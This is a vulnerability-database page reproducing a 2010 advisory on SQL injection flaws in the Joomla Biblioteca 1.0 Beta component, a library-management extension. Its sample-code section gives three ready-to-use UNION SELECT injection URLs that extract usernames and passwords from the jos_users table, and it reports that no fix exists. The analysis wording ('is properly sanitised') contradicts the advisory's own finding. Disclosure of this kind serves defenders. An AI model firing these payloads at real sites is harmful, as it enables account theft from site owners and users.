Lucene search
K

Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 30 Views

Joomla Component Biblioteca 1.0 Beta SQL Injection Vulnerabilitie

Code

                                                Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

 Name              Biblioteca
 Vendor            http://www.cielostellato.info
 Versions Affected 1.0 Beta

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-21

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

Component  that  allows  the automatic  management  of a
library  in  electronic format. It' can manage books and
their  loans  through   an   attractive  graphical  user
interface simple and usable.


II. DESCRIPTION
_______________

This component doesn't use the common Joomla's functions
to  get  the parameters's value from GET, POST etc.. and
all  of  these  are  not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_____________

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple SQL Injection
 

A) Multiple Blind SQL Injection
_______________________________


The  parameter  testo  passed  to  bi.php (site and admin
frontends)  is  properly sanitised before being used in a
SQL query.This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.


B) Multiple SQL Injection
_________________________

The  parameter testo  passed  to  stampa.php, pdf.php and 
models/biblioteca.php (when "view" is set to "biblioteca"
) is  properly sanitised before being used in SQL queries.
This  can  be  exploited to  manipulate  SQL  queries  by
injecting arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Multiple SQL Injection

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23


V. FIX
______

No fix.


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
30